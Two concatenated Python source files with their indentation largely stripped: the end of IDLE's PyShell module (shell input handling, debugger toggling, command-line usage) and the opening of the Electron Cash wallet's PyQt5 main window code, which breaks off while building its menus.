return warning_stream
def toggle_debugger(self, event=None):
if self.executing:
tkMessageBox.showerror("Don't debug now",
"You can only toggle the debugger when idle",
master=self.text)
self.set_debugger_indicator()
return "break"
else:
db = self.interp.getdebugger()
if db:
self.close_debugger()
else:
self.open_debugger()
def set_debugger_indicator(self):
db = self.interp.getdebugger()
self.setvar("<<toggle-debugger>>", not not db)
def toggle_jit_stack_viewer(self, event=None):
pass # All we need is the variable
def close_debugger(self):
db = self.interp.getdebugger()
if db:
self.interp.setdebugger(None)
db.close()
if self.interp.rpcclt:
RemoteDebugger.close_remote_debugger(self.interp.rpcclt)
self.resetoutput()
self.console.write("[DEBUG OFF]\n")
sys.ps1 = ">>> "
self.showprompt()
self.set_debugger_indicator()
def open_debugger(self):
if self.interp.rpcclt:
dbg_gui = RemoteDebugger.start_remote_debugger(self.interp.rpcclt,
self)
else:
dbg_gui = Debugger.Debugger(self)
self.interp.setdebugger(dbg_gui)
dbg_gui.load_breakpoints()
sys.ps1 = "[DEBUG ON]\n>>> "
self.showprompt()
self.set_debugger_indicator()
def beginexecuting(self):
"Helper for ModifiedInterpreter"
self.resetoutput()
self.executing = 1
def endexecuting(self):
"Helper for ModifiedInterpreter"
self.executing = 0
self.canceled = 0
self.showprompt()
def close(self):
"Extend EditorWindow.close()"
if self.executing:
response = tkMessageBox.askokcancel(
"Kill?",
"The program is still running!\n Do you want to kill it?",
default="ok",
parent=self.text)
if response is False:
return "cancel"
if self.reading:
self.top.quit()
self.canceled = True
self.closing = True
# Wait for poll_subprocess() rescheduling to stop
self.text.after(2 * self.pollinterval, self.close2)
def close2(self):
return EditorWindow.close(self)
def _close(self):
"Extend EditorWindow._close(), shut down debugger and execution server"
self.close_debugger()
if use_subprocess:
self.interp.kill_subprocess()
# Restore std streams
sys.stdout = self.save_stdout
sys.stderr = self.save_stderr
sys.stdin = self.save_stdin
# Break cycles
self.interp = None
self.console = None
self.flist.pyshell = None
self.history = None
EditorWindow._close(self)
def ispythonsource(self, filename):
"Override EditorWindow method: never remove the colorizer"
return True
def short_title(self):
return self.shell_title
COPYRIGHT = \
'Type "copyright", "credits" or "license()" for more information.'
firewallmessage = """
****************************************************************
Personal firewall software may warn about the connection IDLE
makes to its subprocess using this computer's internal loopback
interface. This connection is not visible on any external
interface and no data is sent to or received from the Internet.
****************************************************************
"""
def begin(self):
self.resetoutput()
if use_subprocess:
nosub = ''
client = self.interp.start_subprocess()
if not client:
self.close()
return False
else:
nosub = "==== No Subprocess ===="
self.write("Python %s on %s\n%s\n%s\nIDLE %s %s\n" %
(sys.version, sys.platform, self.COPYRIGHT,
self.firewallmessage, idlever.IDLE_VERSION, nosub))
self.showprompt()
import Tkinter
Tkinter._default_root = None # 03Jan04 KBK What's this?
return True
def readline(self):
save = self.reading
try:
self.reading = 1
self.top.mainloop() # nested mainloop()
finally:
self.reading = save
line = self.text.get("iomark", "end-1c")
if len(line) == 0: # may be EOF if we quit our mainloop with Ctrl-C
line = "\n"
if isinstance(line, unicode):
from idlelib import IOBinding
try:
line = line.encode(IOBinding.encoding)
except UnicodeError:
pass
self.resetoutput()
if self.canceled:
self.canceled = 0
if not use_subprocess:
raise KeyboardInterrupt
if self.endoffile:
self.endoffile = 0
line = ""
return line
def isatty(self):
return True
def cancel_callback(self, event=None):
try:
if self.text.compare("sel.first", "!=", "sel.last"):
return # Active selection -- always use default binding
except:
pass
if not (self.executing or self.reading):
self.resetoutput()
self.interp.write("KeyboardInterrupt\n")
self.showprompt()
return "break"
self.endoffile = 0
self.canceled = 1
if (self.executing and self.interp.rpcclt):
if self.interp.getdebugger():
self.interp.restart_subprocess()
else:
self.interp.interrupt_subprocess()
if self.reading:
self.top.quit() # exit the nested mainloop() in readline()
return "break"
def eof_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (delete next char) take over
if not (self.text.compare("iomark", "==", "insert") and
self.text.compare("insert", "==", "end-1c")):
return # Let the default binding (delete next char) take over
if not self.executing:
self.resetoutput()
self.close()
else:
self.canceled = 0
self.endoffile = 1
self.top.quit()
return "break"
def linefeed_callback(self, event):
# Insert a linefeed without entering anything (still autoindented)
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
return "break"
def enter_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (insert '\n') take over
# If some text is selected, recall the selection
        # (but only if it is before the I/O mark)
try:
sel = self.text.get("sel.first", "sel.last")
if sel:
if self.text.compare("sel.last", "<=", "iomark"):
self.recall(sel, event)
return "break"
except:
pass
# If we're strictly before the line containing iomark, recall
# the current line, less a leading prompt, less leading or
# trailing whitespace
if self.text.compare("insert", "<", "iomark linestart"):
# Check if there's a relevant stdin range -- if so, use it
prev = self.text.tag_prevrange("stdin", "insert")
if prev and self.text.compare("insert", "<", prev[1]):
self.recall(self.text.get(prev[0], prev[1]), event)
return "break"
next = self.text.tag_nextrange("stdin", "insert")
if next and self.text.compare("insert lineend", ">=", next[0]):
self.recall(self.text.get(next[0], next[1]), event)
return "break"
# No stdin mark -- just get the current line, less any prompt
indices = self.text.tag_nextrange("console", "insert linestart")
if indices and \
self.text.compare(indices[0], "<=", "insert linestart"):
self.recall(self.text.get(indices[1], "insert lineend"), event)
else:
self.recall(self.text.get("insert linestart", "insert lineend"), event)
return "break"
# If we're between the beginning of the line and the iomark, i.e.
# in the prompt area, move to the end of the prompt
if self.text.compare("insert", "<", "iomark"):
self.text.mark_set("insert", "iomark")
# If we're in the current input and there's only whitespace
# beyond the cursor, erase that whitespace first
s = self.text.get("insert", "end-1c")
if s and not s.strip():
self.text.delete("insert", "end-1c")
# If we're in the current input before its last line,
# insert a newline right at the insert point
if self.text.compare("insert", "<", "end-1c linestart"):
self.newline_and_indent_event(event)
return "break"
# We're in the last line; append a newline and submit it
self.text.mark_set("insert", "end-1c")
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
self.text.tag_add("stdin", "iomark", "end-1c")
self.text.update_idletasks()
if self.reading:
self.top.quit() # Break out of recursive mainloop() in raw_input()
else:
self.runit()
return "break"
def recall(self, s, event):
# remove leading and trailing empty or whitespace lines
        s = re.sub(r'^\s*\n', '', s)
s = re.sub(r'\n\s*$', '', s)
lines = s.split('\n')
self.text.undo_block_start()
try:
self.text.tag_remove("sel", "1.0", "end")
self.text.mark_set("insert", "end-1c")
prefix = self.text.get("insert linestart", "insert")
if prefix.rstrip().endswith(':'):
self.newline_and_indent_event(event)
prefix = self.text.get("insert linestart", "insert")
self.text.insert("insert", lines[0].strip())
if len(lines) > 1:
orig_base_indent = re.search(r'^([ \t]*)', lines[0]).group(0)
new_base_indent = re.search(r'^([ \t]*)', prefix).group(0)
for line in lines[1:]:
if line.startswith(orig_base_indent):
# replace orig base indentation with new indentation
line = new_base_indent + line[len(orig_base_indent):]
self.text.insert('insert', '\n'+line.rstrip())
finally:
self.text.see("insert")
self.text.undo_block_stop()
def runit(self):
line = self.text.get("iomark", "end-1c")
# Strip off last newline and surrounding whitespace.
# (To allow you to hit return twice to end a statement.)
i = len(line)
while i > 0 and line[i-1] in " \t":
i = i-1
if i > 0 and line[i-1] == "\n":
i = i-1
while i > 0 and line[i-1] in " \t":
i = i-1
line = line[:i]
more = self.interp.runsource(line)
def open_stack_viewer(self, event=None):
if self.interp.rpcclt:
return self.interp.remote_stack_viewer()
try:
sys.last_traceback
except:
tkMessageBox.showerror("No stack trace",
"There is no stack trace yet.\n"
"(sys.last_traceback is not defined)",
master=self.text)
return
from idlelib.StackViewer import StackBrowser
sv = StackBrowser(self.root, self.flist)
def view_restart_mark(self, event=None):
self.text.see("iomark")
self.text.see("restart")
def restart_shell(self, event=None):
self.interp.restart_subprocess()
def showprompt(self):
self.resetoutput()
try:
s = str(sys.ps1)
except:
s = ""
self.console.write(s)
self.text.mark_set("insert", "end-1c")
self.set_line_and_column()
self.io.reset_undo()
def resetoutput(self):
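        # Save whatever the user typed since the last prompt into the history,
        # then move "iomark" to the end so new output starts on a fresh line.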
source = self.text.get("iomark", "end-1c")
if self.history:
self.history.history_store(source)
if self.text.get("end-2c") != "\n":
self.text.insert("end-1c", "\n")
self.text.mark_set("iomark", "end-1c")
self.set_line_and_column()
sys.stdout.softspace = 0
def write(self, s, tags=()):
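        # Give "iomark" right gravity while writing so the mark ends up after the
        # new output, then restore left gravity so text typed at the prompt does
        # not drag the mark along.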
try:
self.text.mark_gravity("iomark", "right")
OutputWindow.write(self, s, tags, "iomark")
self.text.mark_gravity("iomark", "left")
except:
pass
if self.canceled:
self.canceled = 0
if not use_subprocess:
raise KeyboardInterrupt
class PseudoFile(object):
def __init__(self, shell, tags, encoding=None):
self.shell = shell
self.tags = tags
self.softspace = 0
self.encoding = encoding
def write(self, s):
self.shell.write(s, self.tags)
def writelines(self, lines):
for line in lines:
self.write(line)
def flush(self):
pass
def isatty(self):
return True
usage_msg = """\
USAGE: idle [-deins] [-t title] [file]*
idle [-dns] [-t title] (-c cmd | -r file) [arg]*
idle [-dns] [-t title] - [arg]*
-h print this help message and exit
-n run IDLE without a subprocess (see Help/IDLE Help for details)
The following options will override the IDLE 'settings' configuration:
-e open an edit window
-i open a shell window
The following options imply -i and will open a shell:
-c cmd run the command in a shell, or
-r file run script from file
-d enable the debugger
-s run $IDLESTARTUP or $PYTHONSTARTUP before anything else
-t title set title of shell window
A default edit window will be bypassed when -c, -r, or - are used.
[arg]* are passed to the command (-c) or script (-r) in sys.argv[1:].
Examples:
idle
Open an edit window or shell depending on IDLE's configuration.
idle foo.py foobar.py
Edit the files, also open a shell if configured to start with shell.
idle -est "Baz" foo.py
Run $IDLESTARTUP or $PYTHONSTARTUP, edit foo.py, and open a shell
window with the title "Baz".
idle -c "import sys; print sys.argv" "foo"
Open a shell window and run the command, passing "-c" in sys.argv[0]
and "foo" in sys.argv[1].
idle -d -s -r foo.py "Hello World"
Open a shell window, run a startup script, enable the debugger, and
run foo.py, passing "foo.py" in sys.argv[0] and "Hello World" in
sys.argv[1].
echo "import sys; print sys.argv" | idle - "foobar"
Open a shell window, run the script piped in, passing '' in sys.argv[0]
and "foobar" in sys.argv[1].
"""
def main():
global flist, root, use_subprocess
use_subprocess = True
enable_shell = False
enable_edit = False
debug = False
cmd = None
script = None
startup = False
try:
opts, args = getopt.getopt(sys.argv[1:], "c:deihnr:st:")
except getopt.error, msg:
sys.stderr.write("Error: %s\n" % str(msg))
sys.stderr.write(usage_msg)
sys.exit(2)
for o, a in opts:
if o == '-c':
cmd = a
enable_shell = True
if o == '-d':
debug = True
enable_shell = True
if o == '-e':
enable_edit = True
if o == '-h':
sys.stdout.write(usage_msg)
sys.exit()
if o == '-i':
enable_shell = True
if o == '-n':
use_subprocess = False
if o == '-r':
script = a
if os.path.isfile(script):
pass
else:
print "No script file: ", script
sys.exit()
enable_shell = True
if o == '-s':
startup = True
enable_shell = True
if o == '-t':
PyShell.shell_title = a
enable_shell = True
if args and args[0] == '-':
cmd = sys.stdin.read()
enable_shell = True
# process sys.argv and sys.path:
for i in range(len(sys.path)):
sys.path[i] = os.path.abspath(sys.path[i])
if args and args[0] == '-':
sys.argv = [''] + args[1:]
elif cmd:
sys.argv = ['-c'] + args
elif script:
sys.argv = [script] + args
elif args:
enable_edit = True
pathx = []
for filename in args:
pathx.append(os.path.dirname(filename))
for dir in pathx:
dir = os.path.abspath(dir)
if dir not in sys.path:
sys.path.insert(0, dir)
else:
dir = os.getcwd()
if not dir in sys.path:
sys.path.insert(0, dir)
# check the IDLE settings configuration (but command line overrides)
edit_start = idleConf.GetOption('main', 'General',
'editor-on-startup', type='bool')
enable_edit = enable_edit or edit_start
enable_shell = enable_shell or not edit_start
# start editor and/or shell windows:
root = Tk(className="Idle")
fixwordbreaks(root)
root.withdraw()
flist = PyShellFileList(root)
macosxSupport.setupApp(root, flist)
if enable_edit:
if not (cmd or script):
for filename in args:
flist.open(filename)
if not args:
flist.new()
if enable_shell:
shell = flist.open_shell()
if not shell:
return # couldn't open shell
if macosxSupport.runningAsOSXApp() and flist.dict:
# On OSX: when the user has double-clicked on a file that causes
# IDLE to be launched the shell window will open just in front of
# the file she wants to see. Lower the interpreter window when
# there are open files.
shell.top.lower()
shell = flist.pyshell
# handle remaining options:
if debug:
shell.open_debugger()
if startup:
filename = os.environ.get("IDLESTARTUP") or \
os.environ.get("PYTHONSTARTUP")
if filename and os.path.isfile(filename):
shell.interp.execfile(filename)
if shell and cmd or script:
shell.interp.runcommand("""if 1:
import sys as _sys
_sys.argv = %r
del _sys
\n""" % (sys.argv,))
if cmd:
shell.interp.execsource(cmd)
elif script:
shell.interp.prepend_syspath(script)
shell.interp.execfile(script)
root.mainloop()
root.destroy()
if __name__ == "__main__":
sys.modules['PyShell'] = sys.modules['__main__']
main()
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys, time, threading
import os, json, traceback
import shutil
import weakref
import webbrowser
import csv
from decimal import Decimal
import base64
from functools import partial
from PyQt5.QtGui import *
from PyQt5.QtCore import *
import PyQt5.QtCore as QtCore
from .exception_window import Exception_Hook
from PyQt5.QtWidgets import *
from electroncash import keystore
from electroncash.address import Address, ScriptOutput
from electroncash.bitcoin import COIN, TYPE_ADDRESS, TYPE_SCRIPT
from electroncash.networks import NetworkConstants
from electroncash.plugins import run_hook
from electroncash.i18n import _
from electroncash.util import (format_time, format_satoshis, PrintError,
format_satoshis_plain, NotEnoughFunds, ExcessiveFee,
UserCancelled, bh2u, bfh, format_fee_satoshis)
import electroncash.web as web
from electroncash import Transaction
from electroncash import util, bitcoin, commands
from electroncash import paymentrequest
from electroncash.wallet import Multisig_Wallet, sweep_preparations
try:
from electroncash.plot import plot_history
except:
plot_history = None
import electroncash.web as web
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, BTCkBEdit, BTCSatsByteEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import *
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
from electroncash.paymentrequest import PR_PAID
class ElectrumWindow(QMainWindow, MessageBoxMixin, PrintError):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
notify_transactions_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
cashaddr_toggled_signal = pyqtSignal()
history_updated_signal = pyqtSignal()
def __init__(self, gui_object, wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config
self.setup_exception_hook()
self.network = gui_object.daemon.network
self.fx = gui_object.daemon.fx
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.is_max = False
self.payment_request = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.op_return_toolong = False
self.internalpluginsdialog = None
self.externalpluginsdialog = None
self.require_fee_update = False
self.tx_notifications = []
self.tl_windows = []
self.tx_external_keypairs = {}
Address.show_cashaddr(config.get('show_cashaddr', False))
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', 8)
self.fee_unit = config.get('fee_unit', 0)
self.num_zeros = int(config.get('num_zeros',0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
self.converter_tab = self.create_converter_tab()
tabs.addTab(self.create_history_tab(), QIcon(":icons/tab_history.png"), _('History'))
tabs.addTab(self.send_tab, QIcon(":icons/tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, QIcon(":icons/tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name, default=False):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), default):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, QIcon(":icons/tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, QIcon(":icons/tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, QIcon(":icons/tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.converter_tab, QIcon(":icons/tab_converter.png"), _("Address Converter"), "converter", True)
add_optional_tab(tabs, self.console_tab, QIcon(":icons/tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(QIcon(":icons/electron-cash.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.cashaddr_toggled_signal.connect(self.update_cashaddr_icon)
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.notify_transactions_signal.connect(self.notify_transactions)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['updated', 'new_transaction', 'status',
'banner', 'verified', 'fee']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
def on_history(self, b):
self.new_fx_history_signal.emit()
def setup_exception_hook(self):
Exception_Hook(self)
@rate_limited(3.0) # Rate limit to no more than once every 3 seconds
def on_fx_history(self):
if self.cleaned_up: return
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
@rate_limited(3.0) # Rate limit to no more than once every 3 seconds
def on_fx_quotes(self):
if self.cleaned_up: return
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
def toggle_tab(self, tab):
show = self.tabs.indexOf(tab) == -1
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide") if show else _("Show")) + " " + tab.tab_description
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
return self.top_level_window_recurse(override)
def diagnostic_name(self):
return "%s/%s" % (PrintError.diagnostic_name(self),
self.wallet.basename() if self.wallet else "None")
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
try:
traceback.print_exception(*exc_info)
except OSError:
# Issue #662, user got IO error.
# We want them to still get the error displayed to them.
pass
self.show_error(str(exc_info[1]))
def on_network(self, event, *args):
if event == 'updated':
self.need_update.set()
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
elif event == 'new_transaction':
tx, wallet = args
if wallet == self.wallet: # filter out tx's not for this wallet
self.tx_notifications.append(tx)
self.notify_transactions_signal.emit()
elif event in ['status', 'banner', 'verified', 'fee']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.print_error("unexpected network message:", event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
self.history_list.update_item(*args)
elif event == 'fee':
pass
else:
self.print_error("unexpected network_qt signal:", event, args)
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
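            # Resolve the OpenAlias record on a daemon thread so a slow lookup
            # cannot block the GUI; alias_received_signal fires when it is done.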
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.print_error('close_wallet', self.wallet.storage.path)
run_hook('close_wallet', self.wallet)
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.wallet = wallet
self.update_recently_visited(wallet.storage.path)
# address used to create a dummy transaction and estimate transaction fee
self.history_list.update()
self.address_list.update()
self.utxo_list.update()
self.need_update.set()
        # The new_transaction callback may have fired before the GUI was ready;
        # now that it is initialized, announce anything that is pending.
self.notify_transactions()
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
run_hook('load_wallet', wallet, self)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.print_error("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
title = '%s %s - %s' % (NetworkConstants.TITLE,
self.wallet.electrum_version,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
self.warn_if_watching_only()
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.can_change_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoin Cash with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoin Cash to be sent to this wallet.")
])
self.show_warning(msg, title=_('Information'))
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
if not os.path.exists(wallet_folder):
wallet_folder = None
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
# Copy file contents
shutil.copyfile(path, new_path)
# Copy file attributes if possible
# (not supported on targets like Flatpak documents)
try:
shutil.copystat(path, new_path)
except (IOError, os.error):
pass
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except (IOError, os.error) as reason:
self.show_critical(_("Electron Cash was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent2 = []
for k in recent:
if os.path.exists(k):
recent2.append(k)
recent = recent2[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
i = 1
while True:
filename = "wallet_%d" % i
if filename in os.listdir(wallet_folder):
i += 1
else:
break
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
hist_menu = wallet_menu.addMenu(_("&History"))
hist_menu.addAction("Plot", self.plot_history_dialog).setEnabled(plot_history is not None)
hist_menu.addAction("Export", self.export_history_dialog)
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.tabs.indexOf(tab) > -1
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
